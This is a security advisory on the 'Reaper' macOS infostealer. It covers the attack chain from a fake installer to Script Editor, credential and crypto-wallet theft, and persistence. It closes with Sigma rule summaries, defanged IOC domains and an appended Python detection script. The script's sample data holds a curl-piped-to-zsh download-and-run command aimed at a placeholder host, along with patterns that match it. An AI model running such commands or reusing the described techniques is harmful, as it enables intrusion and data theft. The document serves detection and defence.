Severity: high

SHub macOS Infostealer Variant 'Reaper' Spoofing Apple Security Updates

A new variant of the 'SHub' macOS infostealer, dubbed Reaper, uses AppleScript to display a fake security update message and install a backdoor, ultimately stealing browser data, financial documents, and cryptocurrency wallet information while bypassing Terminal-based mitigations in macOS.

A new variant of the SHub macOS infostealer, dubbed Reaper, has emerged, employing a novel approach to bypass existing security mitigations. Unlike previous SHub campaigns that relied on tricking users into pasting commands in Terminal, Reaper leverages the applescript:// URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript. This technique circumvents Apple’s late March mitigations in macOS Tahoe 26.4, which aimed to block the execution of harmful commands pasted into the Terminal. SentinelOne researchers discovered that victims are lured by fake installers for WeChat and Miro applications hosted on domains designed to appear legitimate. The malware fingerprints the victim’s device to detect virtual machines and VPNs, and enumerates installed browser extensions for password managers and cryptocurrency wallets, sending telemetry data to the attacker via a Telegram bot.

Attack Chain

  1. The victim visits a malicious website impersonating WeChat or Miro.
  2. The website fingerprints the visitor’s device, checking for VMs/VPNs and enumerating browser extensions. This information is sent to a Telegram bot.
  3. The website prompts the user to download a fake installer, which then uses the applescript:// URL scheme.
  4. Clicking the URL opens the macOS Script Editor with a preloaded malicious AppleScript.
  5. If the user clicks “Run” in the Script Editor, the script displays a fake Apple security update message referencing XProtectRemediator.
  6. The script downloads a shell script using curl and executes it silently via zsh.
  7. The shell script checks for a Russian keyboard layout; if detected, the malware exits.
  8. If the keyboard layout is not Russian, the script retrieves a second AppleScript containing the data-theft routines and executes it via osascript. This script prompts the user for their macOS password and then steals browser data, cryptocurrency wallet data, and other sensitive files. The malware establishes persistence by installing a script that impersonates Google's software updater and registering it as a LaunchAgent, which runs every minute as a beacon.

Impact

Successful infection by the SHub Reaper infostealer results in the theft of sensitive data, including browser data from Chrome, Firefox, Edge, Opera, Vivaldi, Arc, and Orion; cryptocurrency wallet data (MetaMask, Phantom); password manager data (1Password, Bitwarden, LastPass); desktop cryptocurrency wallet application data (Exodus, Atomic Wallet, Ledger Live, Trezor Suite); iCloud account data; Telegram session data; and developer configuration files. The malware also targets files in the Desktop and Documents folders, collecting documents smaller than 2MB and images up to 6MB (total limit 150MB). Cryptocurrency wallet applications are hijacked by replacing their core application file with a malicious version downloaded from the C2 server. This gives the attacker persistent access to the compromised machine and enables further malware deployment.

Recommendation

  • Monitor for suspicious outbound network traffic following Script Editor execution.
  • Monitor for the creation of new LaunchAgents and related files in the namespace of trusted vendors to detect persistence mechanisms, as recommended by SentinelOne.
  • Block access to the known malicious domains qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, and mlroweb[.]com at the DNS resolver, based on the IOCs provided below.

Detection coverage (3 rules)

Detect SHub Reaper - Suspicious AppleScript Execution via Open Command

Severity: medium

Detects execution of AppleScript via the 'open' command, which may indicate malicious activity such as SHub Reaper.

Format: Sigma. Tactic: Execution. Technique: T1059.003. Log sources: process_creation, macos.

Detect SHub Reaper - Suspicious Curl Usage

Severity: high

Detects curl being used to download a file and pipe it to a shell for execution, which is typical of malware such as SHub Reaper.

Format: Sigma. Tactic: Execution. Technique: T1059.004. Log sources: process_creation, macos.

Detect SHub Reaper - Persistence via Google Update Impersonation

Severity: medium

Detects persistence via a LaunchAgent masquerading as Google Update.

Format: Sigma. Tactic: Persistence. Technique: T1543.001. Log sources: file_event, macos.
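As an added example (not part of this advisory and not the platform's Sigma rules), the three behaviours above expressed as Python checks run over constructed macOS telemetry. The applescript:// URL, the file paths and the Google install-prefix allow-list are assumptions for illustration, not values taken from the page; note that Google's real Keystone updater also installs a LaunchAgent named after Google, so the third rule compares the program path rather than the name alone.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry: process command lines and LaunchAgent file
# events. None of it is captured from a real infection; the applescript://
# URL and the file paths are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"kind": "process_creation", "cmd": "/usr/bin/open applescript://placeholder-script"},
    {"kind": "process_creation", "cmd": "/bin/zsh -c curl -fsSL https://example.invalid/s.sh | zsh"},
    {"kind": "process_creation", "cmd": "/usr/bin/curl -o /tmp/a.pdf https://example.invalid/a.pdf"},
    {"kind": "file_event", "path": "/Users/u/Library/LaunchAgents/com.google.update.plist",
     "program": "/Users/u/Library/Application Support/.updater/google_update.sh"},
    {"kind": "file_event", "path": "/Users/u/Library/LaunchAgents/com.google.keystone.agent.plist",
     "program": "/Users/u/Library/Google/GoogleSoftwareUpdate/Agent"},
]

def applescript_via_open(cmd: str) -> bool:
    """Rule 1: `open` handed an applescript:// URL (Script Editor preload)."""
    return re.search(r"(?:^|/)open\s+.*applescript://", cmd) is not None

def curl_piped_to_shell(cmd: str) -> bool:
    """Rule 2: curl output piped straight into sh, bash or zsh."""
    return re.search(r"\bcurl\b[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b", cmd) is not None

def fake_google_launchagent(path: str, program: str) -> bool:
    """Rule 3: a LaunchAgent plist named after Google whose program lives
    outside Google's own install prefix (assumed allow-list; tune per fleet)."""
    in_agents = "/Library/LaunchAgents/" in path and path.endswith(".plist")
    named_google = "google" in path.rsplit("/", 1)[-1].lower()
    legit = re.match(r"^(?:/Users/[^/]+)?/Library/Google/", program) is not None
    return in_agents and named_google and not legit

def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run all three rules over a list of events; return (rule, evidence) hits."""
    hits: List[Tuple[str, str]] = []
    for e in events:
        if e["kind"] == "process_creation":
            if applescript_via_open(e["cmd"]):
                hits.append(("applescript_open", e["cmd"]))
            if curl_piped_to_shell(e["cmd"]):
                hits.append(("curl_to_shell", e["cmd"]))
        elif e["kind"] == "file_event" and fake_google_launchagent(e["path"], e["program"]):
            hits.append(("fake_google_launchagent", e["path"]))
    return hits

if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

On the constructed events the legitimate curl download and the genuine Keystone agent produce no hits; only the three Reaper-style behaviours are flagged.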


Indicators of compromise (3)

Type     Value
domain   qq-0732gwh22[.]com
domain   mlcrosoft[.]co[.]com
domain   mlroweb[.]com